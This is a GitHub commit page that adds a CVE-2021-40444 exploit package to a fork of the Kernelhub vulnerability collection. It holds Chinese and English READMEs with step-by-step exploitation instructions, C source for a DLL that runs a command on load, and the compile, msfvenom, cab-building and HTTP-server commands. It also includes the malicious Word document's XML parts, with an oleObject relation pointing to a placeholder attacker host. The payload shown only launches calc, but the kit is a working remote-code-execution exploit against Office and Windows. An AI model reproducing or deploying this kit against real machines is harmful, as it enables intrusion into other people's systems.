forked from Ascotbe/Kernelhub
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Add IE RCE Vulnerability:sweet_potato:
- Loading branch information
Showing
26 changed files
with
1,123 additions
and
253 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,124 @@ | ||
### CVE-2021-40444 | ||
|
||
#### 描述 | ||
|
||
这个漏洞是IE浏览器的漏洞,但是offer相关组件默认使用的是IE浏览器,所以在offer相关组件禁用了ActiveX也一样可以执行 | ||
|
||
#### 影响版本 | ||
|
||
| Product | CPU Architecture | Version | Update | Tested | | ||
| ------------------- | ---------------- | ------- | ------ | -------- | | ||
| Windows 10 | x86/x64 | | | | | ||
| Windows 10 | x86/x64 | 1607 | | | | ||
| Windows 10 | x86/x64/AMD64 | 1809 | | | | ||
| Windows 10 | x86/x64/AMD64 | 1909 | | | | ||
| Windows 10 | x86/x64/AMD64 | 2004 | | ✔ | | ||
| Windows 10 | x86/x64/AMD64 | 20H2 | | | | ||
| Windows 10 | x86/x64/AMD64 | 21H1 | | | | ||
| Windows 7 | x86/x64 | | SP1 | | | ||
| Windows 8.1 | x86/x64 | | | | | ||
| Windows Rt 8.1 | | | | | | ||
| Windows Server 2008 | x86/x64 | | SP2 | | | ||
| Windows Server 2008 | x64 | R2 | SP1 | | | ||
| Windows Server 2012 | | | | | | ||
| Windows Server 2012 | | R2 | | | | ||
| Windows Server 2016 | | | | | | ||
| Windows Server 2019 | | | | | | ||
| Windows Server 2022 | | | | | | ||
| Windows Server | | 2004 | | | | ||
| Windows Server | | 20H2 | | | | ||
|
||
|
||
|
||
#### 修复补丁 | ||
|
||
``` | ||
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36934 | ||
``` | ||
|
||
#### 利用原理 | ||
|
||
根据之前在野利用样本`938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52`可以知道,其实就是利用默认浏览器(IE)加载ActiveX | ||
|
||
![image-20210911112944428](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_1.png) | ||
|
||
本质上恶意利用只需要修改样本中的`document.xml.rels`文件中框起来mhtml和x-usc这两段内容该为恶意目标网页,即可达到利用 | ||
|
||
#### 利用方式 | ||
|
||
首先需要生成一个恶意的DLL文件,通过msf或者自己编译都行 | ||
|
||
- 自己编译 | ||
|
||
```c | ||
//calc.c | ||
#include <windows.h> | ||
|
||
void exec(void) { | ||
system("cmd /c calc"); | ||
return; | ||
} | ||
|
||
BOOL WINAPI DllMain( | ||
HINSTANCE hinstDLL, | ||
DWORD fdwReason, | ||
LPVOID lpReserved ) | ||
{ | ||
switch( fdwReason ) | ||
{ | ||
case DLL_PROCESS_ATTACH: | ||
exec(); | ||
break; | ||
|
||
case DLL_THREAD_ATTACH: | ||
break; | ||
|
||
case DLL_THREAD_DETACH: | ||
break; | ||
|
||
case DLL_PROCESS_DETACH: | ||
break; | ||
} | ||
return TRUE; | ||
} | ||
``` | ||
然后运行命令 | ||
``` | ||
i686-w64-mingw32-gcc -shared calc.c -o calc.dll | ||
``` | ||
- 通过msf编译 | ||
``` | ||
msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f dll>>calc.dll | ||
``` | ||
> 最好使用MSF生成DLL文件! | ||
> | ||
> 还有请看准对应机器,有些Windows 10 版本不存在该问题 | ||
安装环境所需要的依赖`sudo apt-get install lcab`,生成 cab用的 | ||
接着使用一键化脚本,`test/calc.dll`这个为你生成的哪个dll所在的绝对路径,`http://you_ip`你启动exp这台机器的IP | ||
``` | ||
cd CVE-2021-40444 ; python3 exploit.py generate test/calc.dll http://you_ip | ||
``` | ||
![image-20210911115757383](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_2.png) | ||
然后启动http服务 | ||
``` | ||
cd srv ; python3 -m http.server 80 | ||
``` | ||
接着把生成的恶意docx文件(在`out/`文件夹中),放到目标机器上(Windows 10 2004 x64),即可执行成功 | ||
![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_3.gif) | ||
#### 参考项目 | ||
- [prcabral](https://github.com/prcabral/CVE-2021-40444) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,77 @@ | ||
# CVE-2021-40444 | ||
|
||
Reproduce steps for CVE-2021-40444 | ||
|
||
These reproduction steps are based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file). | ||
|
||
## Generating docx | ||
|
||
Go to `maldoc/word/_rels/document.xml.rels` and edit the two ocurrences for `http://<HOST>` with the URL to the exploit.html Eg.: `http://127.0.0.1/exploit.html` file. | ||
|
||
Generate docx: | ||
|
||
`cd maldoc/ ; zip -r maldoc.docx *` | ||
|
||
## Generating malicious cab | ||
|
||
``` | ||
#include <windows.h> | ||
void exec(void) { | ||
system("C:\\Windows\\System32\\calc.exe"); | ||
return; | ||
} | ||
BOOL WINAPI DllMain( | ||
HINSTANCE hinstDLL, | ||
DWORD fdwReason, | ||
LPVOID lpReserved ) | ||
{ | ||
switch( fdwReason ) | ||
{ | ||
case DLL_PROCESS_ATTACH: | ||
exec(); | ||
break; | ||
case DLL_THREAD_ATTACH: | ||
break; | ||
case DLL_THREAD_DETACH: | ||
break; | ||
case DLL_PROCESS_DETACH: | ||
break; | ||
} | ||
return TRUE; | ||
} | ||
``` | ||
|
||
Exec: | ||
|
||
`i686-w64-mingw32-gcc -shared calc.c -o calc.dll` | ||
|
||
Generate cab (install lcab `sudo apt-get install lcab`) | ||
|
||
`cp calc.dll championship.inf ; mkdir gen/ ; cd gen/ ; lcab '../championship.inf' out.cab` | ||
|
||
Copy out.cab into `www/` directory, modify exploit.html to point to `http://127.0.0.1/out.cab` | ||
|
||
Execute Python script: `patch_cab.py` | ||
|
||
Finally, setup server: | ||
|
||
`cd www/ ; sudo python3 -m http.server 80` | ||
|
||
# End | ||
|
||
Execute now maldoc.docx in target VM | ||
|
||
If not working, make sure there is a `championship.inf` file at `C:\Users\<user>\AppData\Temp\` | ||
|
||
If file is present but DLL did not get executed, make sure you are opening docx from a folder reached from by exploit.html, like Documents, Desktop, or Downloads. | ||
|
||
# More | ||
|
||
To automatically resolve the array obfuscation on HTML file use `deobfuscate.py` (already has hardcoded the mutated array) | ||
|
||
Anyway, there is already a deobfuscated version: `deob.html` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> | ||
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="jpeg" ContentType="image/jpeg"/><Default Extension="wmf" ContentType="image/x-wmf"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> | ||
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> | ||
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal</Template><TotalTime>34</TotalTime><Pages>1</Pages><Words>206</Words><Characters>1176</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>9</Lines><Paragraphs>2</Paragraphs><ScaleCrop>false</ScaleCrop><Company>Consumers Association</Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>1380</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>16.0000</AppVersion></Properties> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> | ||
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title></dc:title><dc:subject></dc:subject><dc:creator>Microsoft</dc:creator><dc:description></dc:description><cp:lastModifiedBy>user</cp:lastModifiedBy><cp:revision>6</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2013-10-31T15:25:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-31T16:47:00Z</dcterms:modified><dc:language>en-US</dc:language></cp:coreProperties> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> | ||
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:<EXPLOIT_HOST_HERE>!x-usc:<EXPLOIT_HOST_HERE>" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/></Relationships> |
Oops, something went wrong.